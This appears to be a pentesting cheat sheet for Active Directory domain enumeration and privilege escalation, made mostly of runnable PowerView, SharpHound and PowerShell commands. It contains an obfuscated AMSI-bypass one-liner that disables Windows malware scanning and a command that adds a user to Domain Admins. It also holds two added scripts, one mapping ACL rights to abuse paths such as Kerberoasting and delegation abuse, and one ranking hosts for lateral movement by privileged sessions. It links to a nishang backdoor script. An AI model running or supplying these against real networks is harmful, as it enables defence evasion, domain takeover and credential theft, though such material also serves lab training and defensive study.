Windows AD Domain Enumeration
User Enumeration
Bypass AMSI (the obfuscated one-liner below flips the amsiInitFailed field; it is a widely shared string, so if PowerView is still blocked after running it the bypass itself was caught and needs re-obfuscating)
powershell -ep bypass
SET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Download PowerView
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
Load PowerView into the current session (dot-source the script)
. .\PowerView.ps1
Get a list of users in the current domain
Get-DomainUser
Get-DomainUser -Identity student1
Find user accounts used as service accounts (SPN set; these are Kerberoast candidates)
Get-DomainUser -SPN
Get selected properties for users in the current domain
Get-DomainUser -Properties pwdlastset
Get-DomainUser -Properties badpwdcount
Get-DomainUser -Properties lastlogon
Get-DomainUser -Properties description
Get-DomainUser -Properties samaccountname,description
All enabled users, returning distinguished names
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname
All disabled users
Get-DomainUser -UACFilter ACCOUNTDISABLE
Domain Group Enumeration
Get all the groups in the current domain (or in another domain you have a trust path to)
Get-DomainGroup
Get-DomainGroup -Domain <targetdomain>
Get all the members of the Domain Admins group (-Recurse expands nested groups; Enterprise Admins only exists in the forest root domain)
Get-DomainGroupMember -Identity "Domain Admins"
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Get-DomainGroupMember -Identity "Enterprise Admins" -Domain <forest root domain>
(Get-NetGroupMember -GroupName "Domain Admins" is the same query in pre-3.0 PowerView syntax)
Get the group membership for a user:
Get-DomainGroup -MemberIdentity "student1"
Domain Computer Enumeration
Enumerate computers in the current domain with 'outlier' properties, i.e. properties not set on the first result returned by Get-DomainComputer (the piped object is used as the reference)
Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier
Get-DomainComputer
Get-DomainComputer -OperatingSystem "*Server 2016*"
Get-DomainComputer -Ping
Get-DomainComputer -Identity "Student.pentesting.local"
GPO and OU Enumeration
A Group Policy Object (GPO) is a virtual collection of policy settings. Each GPO has a unique name (a GUID) and a display name.
Get-DomainGPO
Get-DomainGPO | Select displayname
Get the GPOs applied to a given computer
Get-DomainGPO -ComputerIdentity <student|ad|dc|web>.pentesting.local
Get machines where the given user is a member of a specific local group (correlated through GPO Restricted Groups / Group Policy Preferences; defaults to the local Administrators group)
Get-DomainGPOUserLocalGroupMapping -Identity student1 -Verbose
Get the current domain
Get-Domain
Enumerate all global catalogs in the forest
Get-ForestGlobalCatalog
Get OUs in a domain
Get-DomainOU
Get the GPOs applied to an OU: read the GPO GUID(s) from the gplink attribute in the Get-DomainOU (Get-NetOU in old syntax) output, then look each one up by name
Get-DomainGPO
Get-DomainGPO -Identity "{AB306569-220D-43FF-B03B-83E8F4EF8081}"
File Shares Enumeration
Find shares on hosts in the current domain.
Find-DomainShare -Verbose
Browse a share and check that the host name resolves
cd \\fileshare.pentesting.local\FileShare
nslookup.exe ad.pentesting.local
Find non-standard shares (skip C$/ADMIN$, IPC$ and print shares)
Find-DomainShare -Verbose -ExcludeStandard -ExcludeIPC -ExcludePrint
Find sensitive files on computers in the domain (Invoke-FileFinder is the pre-3.0 name for Find-InterestingDomainShareFile)
Find-InterestingDomainShareFile -Verbose
Get all file servers of the domain (hosts referenced by users' homeDirectory, scriptPath and profilePath attributes)
Get-DomainFileServer -Verbose
Intro to ACL
Get the ACLs associated with the specified object (-ResolveGUIDs turns property and extended-right GUIDs into readable names; Get-ObjectAcl -SamAccountName is the pre-3.0 syntax)
Get-DomainObjectAcl -Identity student1 -ResolveGUIDs
Find every object on which a given principal holds GenericWrite (in the GUI this is "Write all properties" under Advanced). Replace the SID with the SID of the principal you are checking:
Get-DomainObjectAcl -Identity * -ResolveGUIDs | ? { ($_.ActiveDirectoryRights -match 'GenericWrite') -and ($_.SecurityIdentifier -match 'S-1-5-21-1070240333-336889418-1185445934-1603') }
Add user to Domain Admins
This only works if the ACE you found is on the Domain Admins group object itself (or you already hold a right such as GenericAll/WriteProperty on its member attribute). GenericWrite on a user object lets you set an SPN for a targeted Kerberoast or change its logon script, not change group memberships. Check membership before and after:
net user student1 /domain
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'student1' -Domain "pentesting"
net user student1 /domain
Active Directory Recon
GitHub: sense-of-security/ADRecon (ADRecon.ps1)
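The ACL query above matches one hard-coded SID. The following is an added example, not code from the original post or from PowerView, that generalises it: it takes every SID the current token holds (own user, every domain group including nested ones, and well-known SIDs such as Authenticated Users), pulls all ACEs in the domain once, keeps the ones that grant a right you can act on, and maps each hit to the abuse primitive the object class allows. It assumes PowerView has been dot-sourced in a domain-joined session; the cmdlet names, parameters and output property names (ObjectDN, AceQualifier, SecurityIdentifier, ObjectAceType, ActiveDirectoryRights) are PowerView's, the list of "dangerous" rights and the abuse descriptions are choices made for this example.

```powershell
# Added example (not from the original post or PowerView). Assumes PowerView is dot-sourced
# in a domain-joined session.

# 1. Every SID the current principal is evaluated against in an AD access check:
#    own SID + every group in the token (domain groups, nested groups, well-known SIDs).
$token  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($token.User.Value) + @($token.Groups | ForEach-Object { $_.Value })

# 2. Rights that translate into a concrete abuse primitive (choice for this example).
$dangerousRights = 'GenericAll|GenericWrite|WriteOwner|WriteDacl|WriteProperty|Self|ExtendedRight'

# 3. Pull every ACE in the domain once. -ResolveGUIDs turns property / extended-right GUIDs
#    into names so ObjectAceType is readable. Slow in large domains; run it once and keep $hits.
$hits = Get-DomainObjectAcl -ResolveGUIDs |
    Where-Object {
        $_.AceQualifier -eq 'AccessAllowed' -and
        $mySids -contains $_.SecurityIdentifier.Value -and
        $_.ActiveDirectoryRights -match $dangerousRights -and
        # Extended right "User-Change-Password" is the self-service change everyone has: noise.
        $_.ObjectAceType -ne 'User-Change-Password'
    }

# 4. Map each hit to what it lets you do, based on the target object's class.
foreach ($ace in $hits) {
    $obj   = Get-DomainObject -Identity $ace.ObjectDN -Properties objectclass,samaccountname
    # objectClass lists the inheritance chain (top, person, ..., user); the last entry is the
    # structural class of the object.
    $class = ($obj.objectclass | Select-Object -Last 1)
    $abuse = switch ($class) {
        'user'     { 'set servicePrincipalName -> targeted Kerberoast; set scriptPath/profilePath; ForceChangePassword if that extended right is present' }
        'group'    { 'add yourself as a member (Add-DomainGroupMember)' }
        'computer' { 'write msDS-AllowedToActOnBehalfOfOtherIdentity -> resource-based constrained delegation' }
        default    { 'WriteDacl/WriteOwner -> grant yourself further rights; inspect manually' }
    }
    [PSCustomObject]@{
        Object     = $ace.ObjectDN
        Class      = $class
        Right      = "$($ace.ActiveDirectoryRights)"
        ObjectType = $ace.ObjectAceType
        ViaSID     = ConvertFrom-SID $ace.SecurityIdentifier.Value
        Abuse      = $abuse
    }
}
```

Read ViaSID carefully: a hit granted to Authenticated Users or Domain Users is a domain-wide misconfiguration, while one granted to your own SID is specific to the account you are running as. PowerView's own Find-InterestingDomainAcl -ResolveGUIDs does the inverse search (modification rights held by any non-built-in principal) and is worth running alongside this.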
BloodHound
Download the BloodHound GUI
Download Neo4j
Download SharpHound (the collector)
https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors
Run the collector from a domain-joined host, then import the resulting zip into the GUI
powershell -ep bypass
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Verbose -Domain pentesting
User Hunting Domain Enumeration
Find all machines in the current domain where the current user has local admin access (Find-LocalAdminAccess checks every computer; Test-AdminAccess checks a single host, and without -ComputerName it checks localhost)
Find-LocalAdminAccess -Verbose
Test-AdminAccess -ComputerName dc -Verbose
Tools (same check over WMI or PS Remoting instead of SMB)
- Find-WMILocalAdminAccess.ps1: https://raw.githubusercontent.com/admin0987654321/admin1/master/Find-WMILocalAdminAccess.ps1
- Find-PSRemotingLocalAdminAccess.ps1
- Set-RemotePSRemoting.ps1 (nishang): https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemotePSRemoting.ps1
Find local admins on all machines of the domain
(needs administrator privileges on non-DC machines).
Find-DomainLocalGroupMember -Verbose
Find computers where a domain admin (or a specified user/group) has sessions:
Find-DomainUserLocation
Find-DomainUserLocation -UserGroupIdentity "RDPUsers"
To confirm admin access on a host
Invoke-Command -ComputerName dc -ScriptBlock { whoami }
Enter-PSSession -ComputerName dc
Find computers where a domain admin is logged in and check whether you have admin access on each (LocalAdmin column):
Find-DomainUserLocation -CheckAccess
Stealth mode: only query high-value hosts (file servers, DFS servers and DCs) for sessions instead of every machine in the domain
Find-DomainUserLocation -Stealth
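Find-DomainUserLocation -CheckAccess gives one row per (privileged user, session, host). The following is an added example, not code from the original post or from PowerView, that turns those rows into a ranked target list: hosts where you are already local admin and where members of a high-value group have a session, ordered by how many such users are resident. It assumes PowerView has been dot-sourced in a domain-joined session; the cmdlet names, parameters and the output property names (UserDomain, UserName, ComputerName, SessionFromName, LocalAdmin) are PowerView's, the list of groups to hunt is a choice made for this example.

```powershell
# Added example (not from the original post or PowerView). Assumes PowerView is dot-sourced
# in a domain-joined session.

# Groups whose members are worth hunting (choice for this example; all exist by default).
$targetGroups = 'Domain Admins', 'Enterprise Admins', 'Administrators', 'Account Operators'

# One query per group. -UserGroupIdentity also accepts an array, but a separate call keeps
# the group name on each row for the report. Add -Stealth to each call to limit the session
# enumeration to file servers, DFS servers and DCs.
$sessions = foreach ($g in $targetGroups) {
    Find-DomainUserLocation -UserGroupIdentity $g -CheckAccess -Verbose |
        Select-Object @{n='Group';e={$g}}, UserDomain, UserName, ComputerName, SessionFromName, LocalAdmin
}

# Collapse to one row per host: do we have admin there, and which privileged users are present.
$ranked = $sessions |
    Group-Object ComputerName |
    ForEach-Object {
        $users = $_.Group.UserName | Sort-Object -Unique
        [PSCustomObject]@{
            ComputerName = $_.Name
            LocalAdmin   = [bool]($_.Group | Where-Object LocalAdmin | Select-Object -First 1)
            UserCount    = @($users).Count
            PrivUsers    = $users -join ','
            Groups       = ($_.Group.Group | Sort-Object -Unique) -join ','
        }
    } |
    Sort-Object LocalAdmin, UserCount -Descending

$ranked | Format-Table -AutoSize

# Hosts to go after first: code execution is already available and a privileged token is resident.
$ranked | Where-Object LocalAdmin | Select-Object -ExpandProperty ComputerName
```

Each Find-DomainUserLocation call enumerates sessions on every reachable computer, so four groups means four sweeps; if that is too noisy, run a single call with all four names in -UserGroupIdentity and accept losing the per-group column.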
https://zakariaf.vercel.app/posts/ad2/